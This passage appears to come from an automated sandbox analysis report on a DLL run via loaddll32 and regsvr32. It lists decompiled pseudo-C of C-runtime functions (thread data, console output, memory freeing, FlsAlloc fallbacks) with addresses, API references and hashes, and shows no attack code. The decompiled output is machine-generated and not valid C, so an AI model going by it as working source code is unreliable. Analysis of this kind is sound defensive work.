				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x73231050; // 0x4
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E73217580(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E73215BA6(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E73217580(__eflags,  *0x73231050, _t51);
							if(__eflags != 0) {
								E73215401(_t51, 0x7323224c);
								E73215C03(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E73217580(__eflags,  *0x73231050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E73217580(0,  *0x73231050, 0);
							_push(0);
							L9:
							E73215C03();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E73217541(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x73231050; // 0x4
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E73215108(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x73231050; // 0x4
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E73217580(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E73215BA6(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E73217580(__eflags,  *0x73231050, _t60);
								if(__eflags != 0) {
									E73215401(_t60, 0x7323224c);
									E73215C03(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E73217580(__eflags,  *0x73231050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E73217580(__eflags,  *0x73231050, _t20);
								_push(_t60);
								L25:
								E73215C03();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E73217541(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x73231050; // 0x4
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E73215108(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x73231050; // 0x4
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E73217580(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E73215BA6(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E73217580(__eflags,  *0x73231050, _t54);
											if(__eflags != 0) {
												E73215401(_t54, 0x7323224c);
												E73215C03(0);
												goto L45;
											} else {
												_t40 = 0;
												E73217580(__eflags,  *0x73231050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E73217580(0,  *0x73231050, 0);
											_push(0);
											L41:
											E73215C03();
											goto L36;
										}
									}
								} else {
									_t54 = E73217541(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x73231050; // 0x4
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x73215603
0x73215603
0x7321560e
0x73215610
0x73215615
0x73215618
0x73215636
0x73215639
0x7321563e
0x73215640
0x00000000
0x73215642
0x7321564e
0x73215651
0x73215652
0x73215654
0x73215679
0x7321567b
0x73215694
0x7321569b
0x732156a0
0x00000000
0x7321567d
0x7321567d
0x73215686
0x7321568b
0x00000000
0x7321568b
0x73215656
0x73215656
0x73215656
0x7321565f
0x73215664
0x73215665
0x73215665
0x7321566a
0x00000000
0x7321566a
0x73215654
0x7321561a
0x73215620
0x73215624
0x73215631
0x00000000
0x73215626
0x73215629
0x732156a3
0x732156a3
0x7321562b
0x7321562b
0x7321562b
0x7321562d
0x7321562d
0x7321562d
0x73215629
0x73215624
0x732156a6
0x732156ae
0x732156b0
0x732156b2
0x732156ba
0x732156bf
0x732156c0
0x732156c5
0x732156c6
0x732156c9
0x732156e3
0x732156e6
0x732156eb
0x732156ed
0x00000000
0x732156ef
0x732156fb
0x732156fe
0x732156ff
0x73215701
0x73215724
0x73215726
0x7321573d
0x73215744
0x73215749
0x00000000
0x73215728
0x7321572f
0x73215734
0x00000000
0x73215734
0x73215703
0x7321570a
0x7321570f
0x73215710
0x73215710
0x73215715
0x00000000
0x73215715
0x73215701
0x732156cb
0x732156d1
0x732156d3
0x732156d5
0x732156de
0x00000000
0x732156d7
0x732156d7
0x732156da
0x73215754
0x73215754
0x73215759
0x7321575c
0x7321575d
0x7321575e
0x73215765
0x73215767
0x7321576c
0x7321576f
0x7321578d
0x73215790
0x73215795
0x73215797
0x00000000
0x73215799
0x732157a5
0x732157a9
0x732157ab
0x732157d0
0x732157d2
0x732157eb
0x732157f2
0x00000000
0x732157d4
0x732157d4
0x732157dd
0x732157e2
0x00000000
0x732157e2
0x732157ad
0x732157ad
0x732157ad
0x732157b6
0x732157bb
0x732157bc
0x732157bc
0x00000000
0x732157c1
0x732157ab
0x73215771
0x73215777
0x73215779
0x7321577b
0x73215788
0x00000000
0x7321577d
0x7321577d
0x73215780
0x732157fa
0x732157fa
0x73215782
0x73215782
0x73215782
0x73215782
0x73215784
0x73215784
0x73215784
0x73215780
0x7321577b
0x732157fd
0x73215805
0x73215807
0x73215807
0x7321580e
0x732156dc
0x7321574c
0x7321574c
0x7321574e
0x00000000
0x73215750
0x73215753
0x73215753
0x7321574e
0x732156da
0x732156d5
0x732156b4
0x732156b9
0x732156b9

APIs

GetLastError.KERNEL32(?,?,?,732198E5,00000000,00000001,73217CF5,?,73219DA2,00000001,?,?,?,73217C8E,?,00000000), ref: 73215608
_free.LIBCMT ref: 73215665
_free.LIBCMT ref: 7321569B
SetLastError.KERNEL32(00000000,00000004,000000FF,?,73219DA2,00000001,?,?,?,73217C8E,?,00000000,00000000,7322FCF8,0000002C,73217CF5), ref: 732156A6

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f36cdb02696caeca2df86e563a78b2e52ffac231fd873ab8d301bf324e2f451a
Instruction ID: 485b30e87c0850f78bbd70b98fa3a44a2ac3675590278c9ec929abf7b34815c5
Opcode Fuzzy Hash: f36cdb02696caeca2df86e563a78b2e52ffac231fd873ab8d301bf324e2f451a
Instruction Fuzzy Hash: 0011A3F33246437BE701366E4F84F5B22EA9BC16B47390274F929921D4EEB59CE15190

Uniqueness

Uniqueness Score: -1.00%

Function 7321575A, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E7321575A(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x73231050; // 0x4
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E73217580(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E73215BA6(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E73217580(__eflags,  *0x73231050, _t18);
							if(__eflags != 0) {
								E73215401(_t18, 0x7323224c);
								E73215C03(0);
								goto L13;
							} else {
								_t13 = 0;
								E73217580(__eflags,  *0x73231050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E73217580(0,  *0x73231050, 0);
							_push(0);
							L9:
							E73215C03();
							goto L4;
						}
					}
				} else {
					_t18 = E73217541(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x73231050; // 0x4
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x73215765
0x73215767
0x7321576c
0x7321576f
0x7321578d
0x73215790
0x73215795
0x73215797
0x00000000
0x73215799
0x732157a5
0x732157a9
0x732157ab
0x732157d0
0x732157d2
0x732157eb
0x732157f2
0x00000000
0x732157d4
0x732157d4
0x732157dd
0x732157e2
0x00000000
0x732157e2
0x732157ad
0x732157ad
0x732157ad
0x732157b6
0x732157bb
0x732157bc
0x732157bc
0x00000000
0x732157c1
0x732157ab
0x73215771
0x73215777
0x7321577b
0x73215788
0x00000000
0x7321577d
0x73215780
0x732157fa
0x732157fa
0x73215782
0x73215782
0x73215782
0x73215784
0x73215784
0x73215784
0x73215780
0x7321577b
0x732157fd
0x73215805
0x7321580e

APIs

GetLastError.KERNEL32(?,?,00000001,73215B98,73215C29,?,?,73214E53), ref: 7321575F
_free.LIBCMT ref: 732157BC
_free.LIBCMT ref: 732157F2
SetLastError.KERNEL32(00000000,00000004,000000FF,?,00000001,73215B98,73215C29,?,?,73214E53), ref: 732157FD

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 9343d30e077319cc6802b4ff64877f206366fd47786fa8c1c46deb1e9738394a
Instruction ID: fa57bb85a6dd027a60f8dadb92629a4b59a8d7925d93e8651dacac8f88d53c99
Opcode Fuzzy Hash: 9343d30e077319cc6802b4ff64877f206366fd47786fa8c1c46deb1e9738394a
Instruction Fuzzy Hash: 1711C2B3304703BBE301367F8F85F6B26EA9BC16B57340274F929961C4EEB59CA25110

Uniqueness

Uniqueness Score: -1.00%

Function 7321AAE6, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7321AAE6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x73231850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E7321AACF();
					E7321AA91();
					_t13 = WriteConsoleW( *0x73231850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x7321ab03
0x7321ab07
0x7321ab14
0x7321ab19
0x7321ab34
0x7321ab34
0x7321ab3a

APIs

WriteConsoleW.KERNEL32(?,?,73217CF5,00000000,?,?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001), ref: 7321AAFD
GetLastError.KERNEL32(?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001,00000000,00000001,?,73219DC6,73217C8E), ref: 7321AB09

Part of subcall function 7321AACF: CloseHandle.KERNEL32(FFFFFFFE,7321AB19,?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001,00000000,00000001), ref: 7321AADF

___initconout.LIBCMT ref: 7321AB19

Part of subcall function 7321AA91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7321AAC0,7321A532,00000001,?,73219872,00000000,00000000,00000001,00000000), ref: 7321AAA4

WriteConsoleW.KERNEL32(?,?,73217CF5,00000000,?,7321A545,?,00000001,?,00000001,?,73219872,00000000,00000000,00000001,00000000), ref: 7321AB2E

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: b966a959f059bbbc9fb4e3bbe03daa46b033923c34f5e4ca2087562caff40691
Instruction ID: 439e2348dd358172e32aa0383308b169d5453709eaeb08503ff1cfa01bedd7bd
Opcode Fuzzy Hash: b966a959f059bbbc9fb4e3bbe03daa46b033923c34f5e4ca2087562caff40691
Instruction Fuzzy Hash: F0F0FE37100256BBDB523E928E08B9A3FA7EB083A0B158014FA1D86110CA319960AB94

Uniqueness

Uniqueness Score: -1.00%

Function 73214F51, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73214F51() {

				E73215C03( *0x73232258);
				 *0x73232258 = 0;
				E73215C03( *0x7323225c);
				 *0x7323225c = 0;
				E73215C03( *0x73231f3c);
				 *0x73231f3c = 0;
				E73215C03( *0x73231f40);
				 *0x73231f40 = 0;
				return 1;
			}

0x73214f5a
0x73214f67
0x73214f6d
0x73214f78
0x73214f7e
0x73214f89
0x73214f8f
0x73214f97
0x73214fa0

APIs

_free.LIBCMT ref: 73214F5A

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 73214F6D
_free.LIBCMT ref: 73214F7E
_free.LIBCMT ref: 73214F8F

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 93f71f062329a4e36a463759a2b1c308de00f02f9668b3c30153e8f4b4c14111
Instruction ID: 249ac66c09f4bc4599a0a5914fed0f90062cf2396b55f65889f15c7f2850ca16
Opcode Fuzzy Hash: 93f71f062329a4e36a463759a2b1c308de00f02f9668b3c30153e8f4b4c14111
Instruction Fuzzy Hash: 51E04FBB6147689BD7017F1BE90878A7B65BB84A00331C086E40802211CBB511A7BF81

Uniqueness

Uniqueness Score: -1.00%

Function 73214850, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E73214850(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E73216B2E(_t48);
						E7321657B(_t48, _t57, 0, 0x73231c98, 0, 0x73231c98, 0x104);
						_t26 =  *0x73231f44; // 0x1643340
						 *0x73231f34 = 0x73231c98;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x73231c98;
							_v20 = 0x73231c98;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E73214B01(E73214988( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E73214988( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E7321646E(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x73231f38 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x73231f3c = _t58;
											L18:
											E73215C03(_t37);
											_v12 = 0;
											L19:
											E73215C03(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x73231f38 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x73231f3c = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E73215B93(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E73215B93(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E73215AD6();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x73214850
0x73214859
0x7321485e
0x73214868
0x7321486b
0x73214888
0x73214889
0x7321489c
0x732148a1
0x732148a9
0x732148af
0x732148b2
0x732148b4
0x732148bb
0x732148bb
0x732148bd
0x732148c0
0x732148c3
0x732148ca
0x732148e3
0x732148e8
0x732148ea
0x7321490b
0x73214913
0x73214916
0x73214931
0x73214934
0x7321493b
0x7321493f
0x73214941
0x73214948
0x7321494b
0x7321494d
0x7321494f
0x73214951
0x7321495b
0x7321495b
0x7321495d
0x73214963
0x73214966
0x73214968
0x7321496e
0x7321496f
0x73214975
0x73214978
0x73214979
0x7321497f
0x73214982
0x00000000
0x00000000
0x00000000
0x00000000
0x73214953
0x73214953
0x73214953
0x73214956
0x73214957
0x73214957
0x00000000
0x73214953
0x73214943
0x00000000
0x73214943
0x7321491b
0x7321491b
0x7321491c
0x73214921
0x73214923
0x73214925
0x7321492a
0x7321492a
0x00000000
0x7321492a
0x732148ec
0x732148f1
0x732148f3
0x732148f4
0x00000000
0x732148f4
0x732148b6
0x732148b9
0x00000000
0x00000000
0x00000000
0x732148b9
0x7321486d
0x73214870
0x00000000
0x00000000
0x73214872
0x73214879
0x7321487a
0x7321487c
0x73214881
0x00000000
0x73214881
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 73214893, 7321489A, 732148D0

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 33abfcff847d8fe418ee59b211e83736f9e2f9af04aa322556d926448ecc295e
Instruction ID: 918f6bdee92f417d1ca78650bfa9f9c2cfce3e1797de28f837b41096f555eb15
Opcode Fuzzy Hash: 33abfcff847d8fe418ee59b211e83736f9e2f9af04aa322556d926448ecc295e
Instruction Fuzzy Hash: 2141A971A1432BAFD711DF99DE80B9EB7FCEF85310F254066E40997240E7B09A90C790

Uniqueness

Uniqueness Score: -1.00%

Function 732175C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E732175C2(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t11;

				_t11 = E732173E1(0x12, "InitializeCriticalSectionEx", 0x7321e478, "InitializeCriticalSectionEx");
				if(_t11 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				 *0x7321d104(_a4, _a8, _a12);
				return  *_t11();
			}

0x732175de
0x732175e5
0x00000000
0x73217602
0x732175f2
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 73217602

Strings

D2!s, xrefs: 732175F2
InitializeCriticalSectionEx, xrefs: 732175C8, 732175D2

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: D2!s$InitializeCriticalSectionEx
API String ID: 2593887523-708662677
Opcode ID: 9dbf9d90e2a1cdfeee1f63889d839fcc29b875cded1c1ad0544cd18b035e55cc
Instruction ID: 50339139ff6adaa19e98ae482403c4dd0b2933048610b6998c1e3cc615f05022
Opcode Fuzzy Hash: 9dbf9d90e2a1cdfeee1f63889d839fcc29b875cded1c1ad0544cd18b035e55cc
Instruction Fuzzy Hash: ACE0923254015ABBDB023E95CE08FDE3FA5DB44761F008120FD6919111CB3149B0FAD0

Uniqueness

Uniqueness Score: -1.00%

Function 732174C3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E732174C3(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t7;

				_t7 = E732173E1(3, "FlsAlloc", 0x7321e42c, "FlsAlloc");
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x7321d104(_a4);
				return  *_t7();
			}

0x732174df
0x732174e6
0x00000000
0x732174f7
0x732174ed
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 732174F7

Strings

FlsAlloc, xrefs: 732174C9, 732174D3
D2!s, xrefs: 732174ED

Memory Dump Source

Source File: 00000000.00000002.899604430.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000000.00000002.898589244.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.902909962.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.907815193.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909029585.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: Alloc
String ID: D2!s$FlsAlloc
API String ID: 2773662609-1107392031
Opcode ID: 1bb505dd20ecc9407afbe592e0da966cb5e93dd30af256c42add5a2a050d23bf
Instruction ID: 50ec555fe7277b19ad7e78c33d1bde16fceaf8227e2d80439f8579c7cb2cbade
Opcode Fuzzy Hash: 1bb505dd20ecc9407afbe592e0da966cb5e93dd30af256c42add5a2a050d23bf
Instruction Fuzzy Hash: 0DE0C233641127BBC202329A6F08BAE7ED4CB90764B408110FD996A102CF640CF1A9E6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 2076 Parent PID: 5092 regsvr32.exeCOMMON

Executed Functions

Function 7321297B, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E7321297B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x7322fa90);
				E732131E0(__ebx, __edi, __esi);
				_t34 =  *0x73231870; // 0x1
				if(_t34 > 0) {
					 *0x73231870 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E73212DC3();
					 *(_t82 - 4) = 1;
					__eflags =  *0x73231bb0 - 2;
					if( *0x73231bb0 != 2) {
						E7321305D(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x7322fab8);
						E732131E0(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E73212B36( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E73212821(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E732119D0( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E732119D0( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E7321297B(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E73212B36( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E73212821(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E73212B36( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x73231870 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E73212E8E(__ebx, _t61, 1, __esi);
						E73212D4A();
						E732131AC();
						 *0x73231bb0 =  *0x73231bb0 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E73212A10();
						_t54 = E7321302F( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E73212A1D();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 732129C2
___scrt_uninitialize_crt.LIBCMT ref: 732129DC

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: e1b0e00e12b48c50fc63ce546d9d7630127dc16c390f9f7a7fa1ef04ee5deea1
Instruction ID: 4a36726837380e86d5c9f34e2559c6a5282c6256c87ff49a83a0ce20fbe39242
Opcode Fuzzy Hash: e1b0e00e12b48c50fc63ce546d9d7630127dc16c390f9f7a7fa1ef04ee5deea1
Instruction Fuzzy Hash: AC41C532E0431FEFEB219F65DA00B5F3AF9EF40B90F154119F81567180D7715AA18BA0

Uniqueness

Uniqueness Score: -1.00%

Function 73212A2B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 89%

